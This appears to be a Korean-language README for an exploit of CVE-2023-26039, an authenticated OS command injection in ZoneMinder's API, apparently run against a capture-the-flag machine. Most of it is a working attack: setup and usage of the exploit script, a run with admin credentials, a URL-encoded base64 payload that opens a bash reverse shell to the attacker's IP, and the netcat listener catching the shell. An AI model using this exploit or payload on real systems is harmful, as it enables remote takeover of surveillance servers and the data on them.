
CVE-2023-26039 - ZoneMinder. 인증된 사용자는 API 명령을 구성하여 웹 사용자로 모든 셸 명령을 실행할 수 있습니다.
ZoneMinder는 Linux용 무료 오픈 소스 폐쇄회로 텔레비전 소프트웨어 애플리케이션으로, IP, USB 및 아날로그 카메라를 지원합니다. 1.36.33 및 1.37.33 이전 버전에는 /web/api/app/Controller/HostController.php의 daemonControl()을 통한 OS 명령 삽입이 포함되어 있습니다. 인증된 모든 사용자는 웹 사용자로 모든 셸 명령을 실행하는 API 명령을 구성할 수 있습니다. 이 문제는 1.36.33 및 1.37.33 버전에서 패치되었습니다.
git clone https://github.com/ungabunga-ctf/CVE-2023-26039
cd CVE-2023-26039
python3 -m venv venv
source venv/bin/activate
pip install requests
python3 CVE-2023-26039.py
python3 CVE-2023-26039.py
usage: CVE-2023-26039.py [-h] -t TARGET -u USERNAME -p PASSWORD [-c CMD] [-lh LHOST] [-lp LPORT]
CVE-2023-26039.py: error: the following arguments are required: -t/--target, -u/--username, -p/--password
첫 번째 터미널에서 다음을 실행하세요
python3 CVE-2023-26039.py -t http://localhost:8080 -u admin -p starcraft122490 -lh 10.10.15.8 -lp 4444
[+] Got token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJab25lTWluZGVyIiwiaWF0IjoxNzg0MzI4MzU3LCJleHAiOjE3ODQzMzU1NTcsInVzZXIiOiJhZG1pbiIsInR5cGUiOiJhY2Nlc3MifQ.BxB6EGkAyc_eaTg4JMYsbLqgmTCu-vh40l8HOoTNHcM...
http://localhost:8080/api/host/daemonControl/zmdc.pl.pl/%24%28echo%20%22YmFzaCAtYyAnYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNS44LzQ0NDQgMD4mMSc%3D%22%7Cbase64%20-d%7Cbash%29.json
그리고 두 번째는 다음과 같습니다
nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.15.8] from (UNKNOWN) [10.129.230.42] 59380
bash: cannot set terminal process group (1080): Inappropriate ioctl for device
bash: no job control in this shell
zoneminder@surveillance:/usr/share/zoneminder/www/api/app/webroot$